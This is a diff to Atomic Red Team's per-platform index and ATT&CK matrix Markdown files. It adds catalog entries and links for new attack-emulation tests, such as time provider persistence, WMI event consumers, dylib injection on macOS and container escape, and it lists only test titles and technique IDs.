 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -463,6 +466,7 @@
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
   - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
+  - Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
   - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -496,7 +500,9 @@
   - Atomic Test #3: Create a system level transient systemd service and timer [linux]
 - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
+  - Atomic Test #1: Create a new time provider [windows]
+  - Atomic Test #2: Edit an existing time provider [windows]
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
   - Atomic Test #1: Named pipe client impersonation [windows]
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
@@ -508,7 +514,8 @@
 - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
-  - Atomic Test #1: Persistence via WMI Event Subscription [windows]
+  - Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
+  - Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
 - [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
   - Atomic Test #1: Modify Fax service to run PowerShell [windows]
   - Atomic Test #2: Service Installation CMD [windows]
@@ -700,6 +707,7 @@
 - [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
   - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
   - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
+  - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
 - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
   - Atomic Test #1: Process Injection via mavinject.exe [windows]
   - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
@@ -1146,6 +1154,7 @@
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
   - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
   - Atomic Test #2: Powershell Execute COM Object [windows]
+  - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
   - Atomic Test #1: ListCronjobs [containers]
@@ -1173,6 +1182,7 @@
 - [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
   - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
   - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
+  - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
 - [T1546.014 Emond](../../T1546.014/T1546.014.md)
   - Atomic Test #1: Persistance with Event Monitor - emond [macos]
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1277,6 +1287,7 @@
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
   - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
+  - Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
   - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -1301,7 +1312,9 @@
   - Atomic Test #2: Create a user level transient systemd service and timer [linux]
   - Atomic Test #3: Create a system level transient systemd service and timer [linux]
 - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
+  - Atomic Test #1: Create a new time provider [windows]
+  - Atomic Test #2: Edit an existing time provider [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
   - Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
@@ -1314,7 +1327,8 @@
 - [T1505.003 Web Shell](../../T1505.003/T1505.003.md)
   - Atomic Test #1: Web Shell Written to Disk [windows]
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
-  - Atomic Test #1: Persistence via WMI Event Subscription [windows]
+  - Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
+  - Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
 - [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
   - Atomic Test #1: Modify Fax service to run PowerShell [windows]
   - Atomic Test #2: Service Installation CMD [windows]
@@ -1791,6 +1805,7 @@
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
   - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
+  - Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1569.002 Service Execution](../../T1569.002/T1569.002.md)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -144,6 +144,7 @@
   - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
 - [T1611 Escape to Host](../../T1611/T1611.md)
   - Atomic Test #1: Deploy container using nsenter container escape [containers]
+  - Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -90,7 +90,8 @@
 - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
+  - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
 - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.014 Emond](../../T1546.014/T1546.014.md)
   - Atomic Test #1: Persistance with Event Monitor - emond [macos]
@@ -171,7 +172,8 @@
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
+  - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
 - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -383,7 +385,8 @@
 - T1136.002 Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
+  - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
 - [T1546.014 Emond](../../T1546.014/T1546.014.md)
   - Atomic Test #1: Persistance with Event Monitor - emond [macos]
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -262,6 +262,7 @@
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
   - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
   - Atomic Test #2: Powershell Execute COM Object [windows]
+  - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
 - [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
   - Atomic Test #1: Access Token Manipulation [windows]
   - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
@@ -344,6 +345,7 @@
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
   - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
+  - Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
   - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -358,13 +360,16 @@
   - Atomic Test #2: Create shortcut to cmd in startup folders [windows]
 - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
+  - Atomic Test #1: Create a new time provider [windows]
+  - Atomic Test #2: Edit an existing time provider [windows]
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
   - Atomic Test #1: Named pipe client impersonation [windows]
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
-  - Atomic Test #1: Persistence via WMI Event Subscription [windows]
+  - Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
+  - Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
 - [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
   - Atomic Test #1: Modify Fax service to run PowerShell [windows]
   - Atomic Test #2: Service Installation CMD [windows]
@@ -843,6 +848,7 @@
 - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
   - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
   - Atomic Test #2: Powershell Execute COM Object [windows]
+  - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -928,6 +934,7 @@
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
   - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
+  - Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
   - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -942,7 +949,9 @@
   - Atomic Test #1: Shortcut Modification [windows]
   - Atomic Test #2: Create shortcut to cmd in startup folders [windows]
 - T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
+  - Atomic Test #1: Create a new time provider [windows]
+  - Atomic Test #2: Edit an existing time provider [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
   - Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
@@ -950,7 +959,8 @@
 - [T1505.003 Web Shell](../../T1505.003/T1505.003.md)
   - Atomic Test #1: Web Shell Written to Disk [windows]
 - [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
-  - Atomic Test #1: Persistence via WMI Event Subscription [windows]
+  - Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
+  - Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
 - [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
   - Atomic Test #1: Modify Fax service to run PowerShell [windows]
   - Atomic Test #2: Service Installation CMD [windows]
@@ -1335,6 +1345,7 @@
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
   - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
+  - Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1569.002 Service Execution](../../T1569.002/T1569.002.md)

atomics/Indexes/Matrices/macos-matrix.md

@@ -9,13 +9,13 @@
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchd](../../T1053.004/T1053.004.md) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchd](../../T1053.004/T1053.004.md) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Emond](../../T1546.014/T1546.014.md) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) |  | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
